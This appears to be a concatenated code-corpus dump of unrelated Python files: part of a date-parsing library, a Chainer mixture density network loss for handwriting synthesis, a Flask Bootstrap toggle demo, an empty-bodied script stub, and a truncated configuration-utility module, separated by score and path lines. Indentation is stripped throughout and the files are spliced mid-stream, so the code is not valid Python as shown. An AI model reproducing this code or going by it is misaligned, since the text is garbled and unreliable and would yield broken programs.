from dateparser.freshness_date_parser import freshness_date_parser
from dateparser.languages.loader import LanguageDataLoader
from dateparser.languages.detection import AutoDetectLanguage, ExactLanguages
from dateparser.conf import apply_settings
from dateparser.utils import normalize_unicode, apply_timezone_from_settings
APOSTROPHE_LOOK_ALIKE_CHARS = [
u'\N{RIGHT SINGLE QUOTATION MARK}', # u'\u2019'
u'\N{MODIFIER LETTER APOSTROPHE}', # u'\u02bc'
u'\N{MODIFIER LETTER TURNED COMMA}', # u'\u02bb'
u'\N{ARMENIAN APOSTROPHE}', # u'\u055a'
u'\N{LATIN SMALL LETTER SALTILLO}', # u'\ua78c'
u'\N{PRIME}', # u'\u2032'
u'\N{REVERSED PRIME}', # u'\u2035'
u'\N{MODIFIER LETTER PRIME}', # u'\u02b9'
u'\N{FULLWIDTH APOSTROPHE}', # u'\uff07'
]
RE_NBSP = re.compile(u'\xa0', flags=re.UNICODE)
RE_SPACES = re.compile(r'\s+')
RE_TRIM_SPACES = re.compile(r'^\s+(\S.*?)\s+$')
RE_SANITIZE_SKIP = re.compile(r'\t|\n|\r|\u00bb|,\s\u0432|\u200e|\xb7|\u200f|\u064e|\u064f', flags=re.M)
RE_SANITIZE_RUSSIAN = re.compile(r'([\W\d])\u0433\.', flags=re.I | re.U)
RE_SANITIZE_AMPM = re.compile(r'\b([ap])(\.)?m(\.)?\b', flags=re.DOTALL | re.I)
RE_SANITIZE_ON = re.compile(r'^.*?on:\s+(.*)')
RE_SANITIZE_APOSTROPHE = re.compile(u'|'.join(APOSTROPHE_LOOK_ALIKE_CHARS))
RE_SEARCH_TIMESTAMP = re.compile(r'^\d{10}(?![^\d.])')
def sanitize_spaces(html_string):
html_string = RE_NBSP.sub(' ', html_string)
html_string = RE_SPACES.sub(' ', html_string)
html_string = RE_TRIM_SPACES.sub(r'\1', html_string)
return html_string
def date_range(begin, end, **kwargs):
dateutil_error_prone_args = ['year', 'month', 'week', 'day', 'hour',
'minute', 'second']
for arg in dateutil_error_prone_args:
if arg in kwargs:
raise ValueError("Invalid argument: %s" % arg)
step = relativedelta(**kwargs) if kwargs else relativedelta(days=1)
date = begin
while date < end:
yield date
date += step
# handles edge-case when iterating months and last interval is < 30 days
if kwargs.get('months', 0) > 0 and (date.year, date.month) == (end.year, end.month):
yield end
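# Illustrative examples (plain datetime objects only):
#   list(date_range(datetime(2015, 1, 1), datetime(2015, 1, 4)))
#     -> [datetime(2015, 1, 1), datetime(2015, 1, 2), datetime(2015, 1, 3)]
#   list(date_range(datetime(2015, 1, 31), datetime(2015, 3, 15), months=1))
#     -> [datetime(2015, 1, 31), datetime(2015, 2, 28), datetime(2015, 3, 15)]   # month-end clamp, then the final partial interval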
def get_intersecting_periods(low, high, period='day'):
if period not in ['year', 'month', 'week', 'day', 'hour', 'minute', 'second', 'microsecond']:
raise ValueError("Invalid period: {}".format(period))
if high <= low:
return
step = relativedelta(**{period + 's': 1})
current_period_start = low
if isinstance(current_period_start, datetime):
reset_arguments = {}
for test_period in ['microsecond', 'second', 'minute', 'hour']:
if test_period == period:
break
else:
reset_arguments[test_period] = 0
current_period_start = current_period_start.replace(**reset_arguments)
if period == 'week':
current_period_start \
= current_period_start - timedelta(days=current_period_start.weekday())
elif period == 'month':
current_period_start = current_period_start.replace(day=1)
elif period == 'year':
current_period_start = current_period_start.replace(month=1, day=1)
while current_period_start < high:
yield current_period_start
current_period_start += step
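# Illustrative example: with period='month', the generator yields the first day of
# each month that intersects the [low, high) span:
#   list(get_intersecting_periods(datetime(2015, 1, 20), datetime(2015, 3, 5), period='month'))
#     -> [datetime(2015, 1, 1), datetime(2015, 2, 1), datetime(2015, 3, 1)]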
def sanitize_date(date_string):
date_string = RE_SANITIZE_SKIP.sub(' ', date_string)
date_string = RE_SANITIZE_RUSSIAN.sub(r'\1 ', date_string) # remove u'г.' (Russian for year) but not in words
date_string = sanitize_spaces(date_string)
date_string = RE_SANITIZE_AMPM.sub(r'\1m', date_string)
date_string = RE_SANITIZE_ON.sub(r'\1', date_string)
date_string = RE_SANITIZE_APOSTROPHE.sub(u"'", date_string)
return date_string
def get_date_from_timestamp(date_string, settings):
if RE_SEARCH_TIMESTAMP.search(date_string):
date_obj = datetime.fromtimestamp(int(date_string[:10]))
date_obj = apply_timezone_from_settings(date_obj, settings)
return date_obj
def get_last_day_of_month(year, month):
return calendar.monthrange(year, month)[1]
def parse_with_formats(date_string, date_formats, settings):
""" Parse with formats and return a dictionary with 'period' and 'obj_date'.
:returns: :class:`datetime.datetime`, dict or None
"""
period = 'day'
for date_format in date_formats:
try:
date_obj = datetime.strptime(date_string, date_format)
except ValueError:
continue
else:
# If format does not include the day, use last day of the month
# instead of first, because the first is usually out of range.
if '%d' not in date_format:
period = 'month'
date_obj = date_obj.replace(
day=get_last_day_of_month(date_obj.year, date_obj.month))
if not ('%y' in date_format or '%Y' in date_format):
today = datetime.today()
date_obj = date_obj.replace(year=today.year)
date_obj = apply_timezone_from_settings(date_obj, settings)
return {'date_obj': date_obj, 'period': period}
else:
return {'date_obj': None, 'period': period}
class _DateLanguageParser(object):
DATE_FORMATS_ERROR_MESSAGE = "Date formats should be list, tuple or set of strings"
def __init__(self, language, date_string, date_formats, settings=None):
self._settings = settings
if isinstance(date_formats, six.string_types):
warn(self.DATE_FORMATS_ERROR_MESSAGE, FutureWarning)
date_formats = [date_formats]
elif not (date_formats is None or isinstance(date_formats, (list, tuple, collections.Set))):
raise TypeError(self.DATE_FORMATS_ERROR_MESSAGE)
self.language = language
self.date_string = date_string
self.date_formats = date_formats
self._translated_date = None
self._translated_date_with_formatting = None
@classmethod
def parse(cls, language, date_string, date_formats=None, settings=None):
instance = cls(language, date_string, date_formats, settings)
return instance._parse()
def _parse(self):
for parser in (
self._try_timestamp,
self._try_freshness_parser,
self._try_given_formats,
self._try_parser,
self._try_hardcoded_formats,
):
date_obj = parser()
if self._is_valid_date_obj(date_obj):
return date_obj
else:
return None
def _try_timestamp(self):
return {
'date_obj': get_date_from_timestamp(self.date_string, self._settings),
'period': 'day',
}
def _try_freshness_parser(self):
return freshness_date_parser.get_date_data(self._get_translated_date(), self._settings)
def _try_parser(self):
_order = self._settings.DATE_ORDER
try:
if self._settings.PREFER_LANGUAGE_DATE_ORDER:
self._settings.DATE_ORDER = self.language.info.get('dateorder', _order)
date_obj, period = date_parser.parse(
self._get_translated_date(), settings=self._settings)
self._settings.DATE_ORDER = _order
return {
'date_obj': date_obj,
'period': period,
}
except ValueError:
self._settings.DATE_ORDER = _order
return None
def _try_given_formats(self):
if not self.date_formats:
return
return parse_with_formats(
self._get_translated_date_with_formatting(),
self.date_formats, settings=self._settings
)
def _try_hardcoded_formats(self):
hardcoded_date_formats = [
'%B %d, %Y, %I:%M:%S %p',
'%b %d, %Y at %I:%M %p',
'%d %B %Y %H:%M:%S',
'%A, %B %d, %Y',
'%Y-%m-%dT%H:%M:%S.%fZ'
]
try:
return parse_with_formats(
self._get_translated_date_with_formatting(),
hardcoded_date_formats,
settings=self._settings
)
except TypeError:
return None
def _get_translated_date(self):
if self._translated_date is None:
self._translated_date = self.language.translate(
self.date_string, keep_formatting=False, settings=self._settings)
return self._translated_date
def _get_translated_date_with_formatting(self):
if self._translated_date_with_formatting is None:
self._translated_date_with_formatting = self.language.translate(
self.date_string, keep_formatting=True, settings=self._settings)
return self._translated_date_with_formatting
def _is_valid_date_obj(self, date_obj):
if not isinstance(date_obj, dict):
return False
if len(date_obj) != 2:
return False
if 'date_obj' not in date_obj or 'period' not in date_obj:
return False
if not date_obj['date_obj']:
return False
if date_obj['period'] not in ('day', 'week', 'month', 'year'):
return False
return True
class DateDataParser(object):
"""
Class which handles language detection, translation and subsequent generic parsing of
string representing date and/or time.
:param languages:
A list of two letters language codes, e.g. ['en', 'es'].
If languages are given, it will not attempt to detect the language.
:type languages: list
:param allow_redetect_language:
Enables/disables language re-detection.
:type allow_redetect_language: bool
:param settings:
Configure customized behavior using settings defined in :mod:`dateparser.conf.Settings`.
:type settings: dict
:return: A parser instance
:raises:
ValueError - Unknown Language, TypeError - Languages argument must be a list
"""
language_loader = None
@apply_settings
def __init__(self, languages=None, allow_redetect_language=False, settings=None):
self._settings = settings
available_language_map = self._get_language_loader().get_language_map()
if isinstance(languages, (list, tuple, collections.Set)):
if all([language in available_language_map for language in languages]):
languages = [available_language_map[language] for language in languages]
else:
unsupported_languages = set(languages) - set(available_language_map.keys())
raise ValueError(
"Unknown language(s): %s" % ', '.join(map(repr, unsupported_languages)))
elif languages is not None:
raise TypeError("languages argument must be a list (%r given)" % type(languages))
if allow_redetect_language:
self.language_detector = AutoDetectLanguage(
languages if languages else list(available_language_map.values()),
allow_redetection=True)
elif languages:
self.language_detector = ExactLanguages(languages=languages)
else:
self.language_detector = AutoDetectLanguage(
list(available_language_map.values()), allow_redetection=False)
def get_date_data(self, date_string, date_formats=None):
"""
Parse string representing date and/or time in recognizable localized formats.
Supports parsing multiple languages and timezones.
:param date_string:
A string representing date and/or time in a recognizably valid format.
:type date_string: str|unicode
:param date_formats:
A list of format strings using directives as given
`here <https://docs.python.org/2/library/datetime.html#strftime-and-strptime-behavior>`_.
The parser applies formats one by one, taking into account the detected languages.
:type date_formats: list
:return: a dict mapping keys to :mod:`datetime.datetime` object and *period*. For example:
{'date_obj': datetime.datetime(2015, 6, 1, 0, 0), 'period': u'day'}
:raises: ValueError - Unknown Language
.. note:: *Period* values can be a 'day' (default), 'week', 'month', 'year'.
*Period* represents the granularity of date parsed from the given string.
In the example below, since no day information is present, the day is assumed to be current
day ``16`` from *current date* (which is June 16, 2015, at the moment of writing this).
Hence, the level of precision is ``month``:
>>> DateDataParser().get_date_data(u'March 2015')
{'date_obj': datetime.datetime(2015, 3, 16, 0, 0), 'period': u'month'}
Similarly, for date strings with no day and month information present, level of precision
is ``year`` and day ``16`` and month ``6`` are from *current_date*.
>>> DateDataParser().get_date_data(u'2014')
{'date_obj': datetime.datetime(2014, 6, 16, 0, 0), 'period': u'year'}
Dates with time zone indications or UTC offsets are returned in UTC time unless
specified using `Settings`_.
>>> DateDataParser().get_date_data(u'23 March 2000, 1:21 PM CET')
{'date_obj': datetime.datetime(2000, 3, 23, 14, 21), 'period': 'day'}
"""
if not(isinstance(date_string, six.text_type) or isinstance(date_string, six.string_types)):
raise TypeError('Input type must be str or unicode')
res = parse_with_formats(date_string, date_formats or [], self._settings)
if res['date_obj']:
return res
if self._settings.NORMALIZE:
date_string = normalize_unicode(date_string)
date_string = sanitize_date(date_string)
for language in self.language_detector.iterate_applicable_languages(
date_string, modify=True, settings=self._settings):
parsed_date = _DateLanguageParser.parse(
language, date_string, date_formats, settings=self._settings)
if parsed_date:
parsed_date['language'] = language.shortname
return parsed_date
else:
return {'date_obj': None, 'period': 'day', 'language': None}
def get_date_tuple(self, *args, **kwargs):
date_tuple = collections.namedtuple('DateData', 'date_obj period language')
date_data = self.get_date_data(*args, **kwargs)
return date_tuple(**date_data)
@classmethod
def _get_language_loader(cls):
if not cls.language_loader:
cls.language_loader = LanguageDataLoader()
return cls.language_loader
| 2.03125 | 2 |
src/models/functions/connection/mixture_density_network.py | kristofbc/handwriting-synthesis | 0 | 3327 | import chainer
import chainer.functions
from chainer.utils import type_check
from chainer import cuda
from chainer import function
import numpy as np
#from chainer import function_node
from utils import clip_grad
#class MixtureDensityNetworkFunction(function_node.FunctionNode):
class MixtureDensityNetworkFunction(function.Function):
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 8)
x_type, eos_input_type, pi_input_type, mu_x1_input_type, mu_x2_input_type, s_x1_input_type, s_x2_input_type, rho_input_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
eos_input_type.dtype.kind == 'f',
pi_input_type.dtype.kind == 'f',
mu_x1_input_type.dtype.kind == 'f',
mu_x2_input_type.dtype.kind == 'f',
s_x1_input_type.dtype.kind == 'f',
s_x2_input_type.dtype.kind == 'f',
rho_input_type.dtype.kind == 'f',
x_type.ndim >= 2,
eos_input_type.ndim >= 2,
x_type.shape[0] == eos_input_type.shape[0],
x_type.shape[0] == pi_input_type.shape[0],
x_type.shape[0] == mu_x1_input_type.shape[0],
x_type.shape[0] == mu_x2_input_type.shape[0],
x_type.shape[0] == s_x1_input_type.shape[0],
x_type.shape[0] == s_x2_input_type.shape[0],
x_type.shape[0] == rho_input_type.shape[0],
pi_input_type.shape[1] == mu_x1_input_type.shape[1],
mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1],
mu_x2_input_type.shape[1] == s_x1_input_type.shape[1],
s_x1_input_type.shape[1] == s_x2_input_type.shape[1],
s_x2_input_type.shape[1] == rho_input_type.shape[1]
)
pass
def forward(self, inputs):
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
#self.retain_inputs(range(len(inputs))) # Retain everything for backward
if not type_check.same_types(*inputs):
raise ValueError("numpy and cupy must not be used together\n"
"type(x): {0}, type(eos_input): {1}, type(pi_input): {2}"
"type(mu_x1_input): {3}, type(mu_x2_input): {4}, type(s_x1_input): {5}"
"type(s_x2_input): {6}, type(rho_input): {7}"
.format(type(x), type(eos_input), type(pi_input),
type(mu_x1_input), type(mu_x2_input), type(s_x1_input),
type(s_x2_input), type(rho_input)))
xp = cuda.get_array_module(*inputs)
def softmax(x):
shiftx = x - x.max()
exps = xp.exp(shiftx)
return exps / xp.sum(exps, 1, keepdims=True)
# Get MDN coeff. Eq #18 to #22
z_eos = 1. / (1. + xp.exp(eos_input)) # F.sigmoid. NOTE: usually sigmoid is 1/(1+e^-x). Here 'x' is >0!
z_s_x1 = xp.exp(s_x1_input) + 1e-10
z_s_x2 = xp.exp(s_x2_input) + 1e-10
z_rho = xp.tanh(rho_input)
z_pi = softmax(pi_input)
#z_pi = xp.exp(pi_input)
#z_pi = z_pi / xp.sum(z_pi, 1, keepdims=True)
z_mu_x1 = mu_x1_input
z_mu_x2 = mu_x2_input
# The MDN coeff are saved, because they're reused in the backward phase
self.z_eos = z_eos
self.z_s_x1 = z_s_x1
self.z_s_x2 = z_s_x2
self.z_rho = z_rho
self.z_pi = z_pi
self.z_mu_x1 = z_mu_x1
self.z_mu_x2 = z_mu_x2
# Compute the loss.
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
# Z variable. Eq. 25
norm_x1 = x1 - z_mu_x1
norm_x2 = x2 - z_mu_x2
z_left = (xp.square(norm_x1)/xp.square(z_s_x1)) + (xp.square(norm_x2)/xp.square(z_s_x2))
z_right = (2.*z_rho*norm_x1*norm_x2)/(z_s_x1*z_s_x2)
z = z_left - z_right
self.z = z
# Normal function. Eq. 24.
inv_ro = 1. - xp.square(z_rho) + 1e-10
n_left = 2. * np.pi * z_s_x1 * z_s_x2 * xp.sqrt(inv_ro) + 1e-10 # + 1e-10 for computational stability
n_right = xp.exp(-z / (2. * inv_ro))
n = n_right / n_left
# Gamma parameter (for the backward phase). Eq. 28-29
gamma = z_pi * n
gamma = gamma / (xp.sum(gamma, 1, keepdims=True) + 1e-10) # sum + 1e-10 for computational stability, != nan!
self.gamma = gamma
# Sequence loss. Eq. 26
loss_y = z_pi * n
loss_y = xp.sum(loss_y, 1, keepdims=True) + 1e-10 # + 1e-10 for computational stability, != nan
#epsilon = xp.full(loss_y.shape, 1e-10, dtype=xp.float32)
#loss_y = xp.maximum(loss_y, epsilon) # Because at the begining loss_y is exactly 0 sometime
loss_y = -xp.log(loss_y + 1e-10)
#loss_x = z_eos * x3 + (1. - z_eos) * (1. - x3)
#loss_x = -xp.log(loss_x)
loss_x = -x3 * xp.log(z_eos + 1e-10) - (1. - x3) * xp.log(1. - z_eos + 1e-10)
loss = loss_y + loss_x
# Mask guard to check if x3 == 2 (added padding)
idx_mask = xp.where(x3==2)[0]
mask = xp.ones_like(x3)
mask[idx_mask, 0] = 0.
self.mask = mask
loss *= mask
return loss, x, z_eos, z_pi, z_mu_x1, z_mu_x2, z_s_x1, z_s_x2, z_rho,
def backward(self, inputs, grad_outputs):
xp = cuda.get_array_module(*inputs)
#x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = self.get_retained_inputs()
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
# MDN coeff to differentiate
g_eos = xp.empty_like(eos_input)
g_s_x1 = xp.empty_like(s_x1_input)
g_s_x2 = xp.empty_like(s_x2_input)
g_rho = xp.empty_like(rho_input)
g_pi = xp.empty_like(pi_input)
g_mu_x1 = xp.empty_like(mu_x1_input)
g_mu_x2 = xp.empty_like(mu_x2_input)
# Compute the gradient
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
#if xp == np:
# From eq. 27 to 37
C = 1. / (1. - self.z_rho*self.z_rho + 1e-10)
d_norm_x1 = (x1 - self.z_mu_x1) / self.z_s_x1
d_norm_x2 = (x2 - self.z_mu_x2) / self.z_s_x2
d_rho_norm_x1 = self.z_rho * d_norm_x1
d_rho_norm_x2 = self.z_rho * d_norm_x2
g_eos = (x3 - self.z_eos) * self.mask
g_pi = (self.z_pi - self.gamma) * self.mask
g_mu_x1 = - self.gamma * ((C/self.z_s_x1) * (d_norm_x1 - d_rho_norm_x2)) * self.mask
g_mu_x2 = - self.gamma * ((C/self.z_s_x2) * (d_norm_x2 - d_rho_norm_x1)) * self.mask
g_s_x1 = - self.gamma * ((C*d_norm_x1) * (d_norm_x1 - d_rho_norm_x2) - 1.) * self.mask
g_s_x2 = - self.gamma * ((C*d_norm_x2) * (d_norm_x2 - d_rho_norm_x1) - 1.) * self.mask
g_rho = - self.gamma * (d_norm_x1*d_norm_x2 + self.z_rho*(1. - C * self.z)) * self.mask
#else:
# g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho = cuda.elementwise(
# 'T x1, T x2, T eos_input, T pi_input, T mu_x1_input, T mu_x2_input, T s_x1_input, T s_x2_input, T rho_input',
# 'T g_eos, T g_pi, T g_mu_x1, T g_mu_x2, T g_s_x1, T g_s_x2, T g_rho',
# )
# Add grad_clipping here if it explodes P.23
th_min = -100.0
th_max = 100.0
g_eos = clip_grad(g_eos, th_min, th_max, xp)
g_pi = clip_grad(g_pi, th_min, th_max, xp)
g_mu_x1 = clip_grad(g_mu_x1, th_min, th_max, xp)
g_mu_x2 = clip_grad(g_mu_x2, th_min, th_max, xp)
g_s_x1 = clip_grad(g_s_x1, th_min, th_max, xp)
g_s_x2 = clip_grad(g_s_x2, th_min, th_max, xp)
g_rho = clip_grad(g_rho, th_min, th_max, xp)
return None, g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho,
def mixture_density_network(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho):
""" Mixture Density Network
Output the coefficient params
Args:
x (Variable): Tensor containing the position [x1, x2, x3] to predict
eos (Variable): End-of-stroke prediction
pi (Variable): mixture components
mu_x1 (Variable): mean of x1
mu_x2 (Variable): mean of x2
s_x1 (Variable): variance of x1
s_x2 (Variable): variance of x2
rho (Variable): correlation parameter
Returns:
loss (Variable)
y (Variable)
eos (Variable)
pi (Variable)
mu_x1 (Variable)
mu_x2 (Variable)
s_x1 (Variable)
s_x2 (Variable)
rho (Variable)
"""
return MixtureDensityNetworkFunction()(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho)
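# Illustrative shape check (numpy/chainer only; batch size and mixture count are
# arbitrary). Per check_type_forward, x is (N, 3), eos is (N, 1) and each mixture
# parameter is (N, n_mix); the first returned element is the per-step loss.
if __name__ == "__main__":
    batch, n_mix = 4, 20
    def rand(cols):
        return np.random.uniform(-1., 1., (batch, cols)).astype(np.float32)
    x = rand(3)
    x[:, 2] = 0.                        # end-of-stroke targets must be 0/1 (2 marks padding)
    outputs = mixture_density_network(x, rand(1), rand(n_mix), rand(n_mix), rand(n_mix),
                                      rand(n_mix), rand(n_mix), rand(n_mix))
    print(outputs[0].shape)             # -> (4, 1)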
| 2.1875 | 2 |
flask__webservers/bootstrap_4__toggle_switch__examples/main.py | DazEB2/SimplePyScripts | 0 | 3328 | <reponame>DazEB2/SimplePyScripts
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: https://github.com/twbs/bootstrap
# SOURCE: https://github.com/gitbrent/bootstrap4-toggle
# SOURCE: https://gitbrent.github.io/bootstrap4-toggle/
from flask import Flask, render_template
app = Flask(__name__)
import logging
logging.basicConfig(level=logging.DEBUG)
@app.route("/")
def index():
return render_template('index.html')
if __name__ == '__main__':
app.debug = True
# Localhost
# port=0 -- random free port
# app.run(port=0)
app.run(
port=5000,
# :param threaded: should the process handle each request in a separate
# thread?
# :param processes: if greater than 1 then handle each request in a new process
# up to this maximum number of concurrent processes.
threaded=True,
)
# # Public IP
# app.run(host='0.0.0.0')
| 2.40625 | 2 |
dev/phonts/visualization/phonts.py | eragasa/pypospack | 4 | 3329 | <gh_stars>1-10
import pypospack.io.phonts as phonts
# <---- additional classes and functions to add on top of
# <---- pypospack.io.phonts
if __name__ == "__main__":
| 1.296875 | 1 |
omegaconf/_utils.py | sugatoray/omegaconf | 1,091 | 3330 | <reponame>sugatoray/omegaconf<gh_stars>1000+
import copy
import os
import re
import string
import sys
import warnings
from contextlib import contextmanager
from enum import Enum
from textwrap import dedent
from typing import (
Any,
Dict,
Iterator,
List,
Optional,
Tuple,
Type,
Union,
get_type_hints,
)
import yaml
from .errors import (
ConfigIndexError,
ConfigTypeError,
ConfigValueError,
GrammarParseError,
OmegaConfBaseException,
ValidationError,
)
from .grammar_parser import SIMPLE_INTERPOLATION_PATTERN, parse
try:
import dataclasses
except ImportError: # pragma: no cover
dataclasses = None # type: ignore # pragma: no cover
try:
import attr
except ImportError: # pragma: no cover
attr = None # type: ignore # pragma: no cover
# Regexprs to match key paths like: a.b, a[b], ..a[c].d, etc.
# We begin by matching the head (in these examples: a, a, ..a).
# This can be read as "dots followed by any character but `.` or `[`"
# Note that a key starting with brackets, like [a], is purposedly *not*
# matched here and will instead be handled in the next regex below (this
# is to keep this regex simple).
KEY_PATH_HEAD = re.compile(r"(\.)*[^.[]*")
# Then we match other keys. The following expression matches one key and can
# be read as a choice between two syntaxes:
# - `.` followed by anything except `.` or `[` (ex: .b, .d)
# - `[` followed by anything then `]` (ex: [b], [c])
KEY_PATH_OTHER = re.compile(r"\.([^.[]*)|\[(.*?)\]")
# source: https://yaml.org/type/bool.html
YAML_BOOL_TYPES = [
"y",
"Y",
"yes",
"Yes",
"YES",
"n",
"N",
"no",
"No",
"NO",
"true",
"True",
"TRUE",
"false",
"False",
"FALSE",
"on",
"On",
"ON",
"off",
"Off",
"OFF",
]
class Marker:
def __init__(self, desc: str):
self.desc = desc
def __repr__(self) -> str:
return self.desc
# To be used as default value when `None` is not an option.
_DEFAULT_MARKER_: Any = Marker("_DEFAULT_MARKER_")
class OmegaConfDumper(yaml.Dumper): # type: ignore
str_representer_added = False
@staticmethod
def str_representer(dumper: yaml.Dumper, data: str) -> yaml.ScalarNode:
with_quotes = yaml_is_bool(data) or is_int(data) or is_float(data)
return dumper.represent_scalar(
yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG,
data,
style=("'" if with_quotes else None),
)
def get_omega_conf_dumper() -> Type[OmegaConfDumper]:
if not OmegaConfDumper.str_representer_added:
OmegaConfDumper.add_representer(str, OmegaConfDumper.str_representer)
OmegaConfDumper.str_representer_added = True
return OmegaConfDumper
def yaml_is_bool(b: str) -> bool:
return b in YAML_BOOL_TYPES
def get_yaml_loader() -> Any:
class OmegaConfLoader(yaml.SafeLoader): # type: ignore
def construct_mapping(self, node: yaml.Node, deep: bool = False) -> Any:
keys = set()
for key_node, value_node in node.value:
if key_node.tag != yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG:
continue
if key_node.value in keys:
raise yaml.constructor.ConstructorError(
"while constructing a mapping",
node.start_mark,
f"found duplicate key {key_node.value}",
key_node.start_mark,
)
keys.add(key_node.value)
return super().construct_mapping(node, deep=deep)
loader = OmegaConfLoader
loader.add_implicit_resolver(
"tag:yaml.org,2002:float",
re.compile(
"""^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$""",
re.X,
),
list("-+0123456789."),
)
loader.yaml_implicit_resolvers = {
key: [
(tag, regexp)
for tag, regexp in resolvers
if tag != "tag:yaml.org,2002:timestamp"
]
for key, resolvers in loader.yaml_implicit_resolvers.items()
}
return loader
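# Illustrative behaviour: unlike the stock SafeLoader, the loader returned here
# rejects duplicate mapping keys, e.g.
#   yaml.load("a: 1\na: 2", Loader=get_yaml_loader())
# raises a ConstructorError instead of silently keeping the last value.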
def _get_class(path: str) -> type:
from importlib import import_module
module_path, _, class_name = path.rpartition(".")
mod = import_module(module_path)
try:
klass: type = getattr(mod, class_name)
except AttributeError:
raise ImportError(f"Class {class_name} is not in module {module_path}")
return klass
def _is_union(type_: Any) -> bool:
return getattr(type_, "__origin__", None) is Union
def _resolve_optional(type_: Any) -> Tuple[bool, Any]:
"""Check whether `type_` is equivalent to `typing.Optional[T]` for some T."""
if getattr(type_, "__origin__", None) is Union:
args = type_.__args__
if len(args) == 2 and args[1] == type(None): # noqa E721
return True, args[0]
if type_ is Any:
return True, Any
return False, type_
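# For instance (illustrative):
#   _resolve_optional(Optional[int])    -> (True, int)
#   _resolve_optional(Union[str, None]) -> (True, str)
#   _resolve_optional(int)              -> (False, int)
#   _resolve_optional(Any)              -> (True, Any)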
def _is_optional(obj: Any, key: Optional[Union[int, str]] = None) -> bool:
"""Check `obj` metadata to see if the given node is optional."""
from .base import Container, Node
if key is not None:
assert isinstance(obj, Container)
obj = obj._get_node(key)
if isinstance(obj, Node):
return obj._is_optional()
else:
# In case `obj` is not a Node, treat it as optional by default.
# This is used in `ListConfig.append` and `ListConfig.insert`
# where the appended/inserted value might or might not be a Node.
return True
def _resolve_forward(type_: Type[Any], module: str) -> Type[Any]:
import typing # lgtm [py/import-and-import-from]
forward = typing.ForwardRef if hasattr(typing, "ForwardRef") else typing._ForwardRef # type: ignore
if type(type_) is forward:
return _get_class(f"{module}.{type_.__forward_arg__}")
else:
if is_dict_annotation(type_):
kt, vt = get_dict_key_value_types(type_)
if kt is not None:
kt = _resolve_forward(kt, module=module)
if vt is not None:
vt = _resolve_forward(vt, module=module)
return Dict[kt, vt] # type: ignore
if is_list_annotation(type_):
et = get_list_element_type(type_)
if et is not None:
et = _resolve_forward(et, module=module)
return List[et] # type: ignore
return type_
def extract_dict_subclass_data(obj: Any, parent: Any) -> Optional[Dict[str, Any]]:
"""Check if obj is an instance of a subclass of Dict. If so, extract the Dict keys/values."""
from omegaconf.omegaconf import _maybe_wrap
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
subclasses_dict = is_dict_subclass(obj_type)
if subclasses_dict:
warnings.warn(
f"Class `{obj_type.__name__}` subclasses `Dict`."
+ " Subclassing `Dict` in Structured Config classes is deprecated,"
+ " see github.com/omry/omegaconf/issues/663",
UserWarning,
stacklevel=9,
)
if is_type:
return None
elif subclasses_dict:
dict_subclass_data = {}
key_type, element_type = get_dict_key_value_types(obj_type)
for name, value in obj.items():
is_optional, type_ = _resolve_optional(element_type)
type_ = _resolve_forward(type_, obj.__module__)
try:
dict_subclass_data[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=parent,
)
except ValidationError as ex:
format_and_raise(
node=None, key=name, value=value, cause=ex, msg=str(ex)
)
return dict_subclass_data
else:
return None
def get_attr_class_field_names(obj: Any) -> List[str]:
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
return list(attr.fields_dict(obj_type))
def get_attr_data(obj: Any, allow_objects: Optional[bool] = None) -> Dict[str, Any]:
from omegaconf.omegaconf import OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
from omegaconf import MISSING
d = {}
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
for name, attrib in attr.fields_dict(obj_type).items():
is_optional, type_ = _resolve_optional(attrib.type)
type_ = _resolve_forward(type_, obj.__module__)
if not is_type:
value = getattr(obj, name)
else:
value = attrib.default
if value == attr.NOTHING:
value = MISSING
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def get_dataclass_field_names(obj: Any) -> List[str]:
return [field.name for field in dataclasses.fields(obj)]
def get_dataclass_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
d = {}
obj_type = get_type_of(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
resolved_hints = get_type_hints(obj_type)
for field in dataclasses.fields(obj):
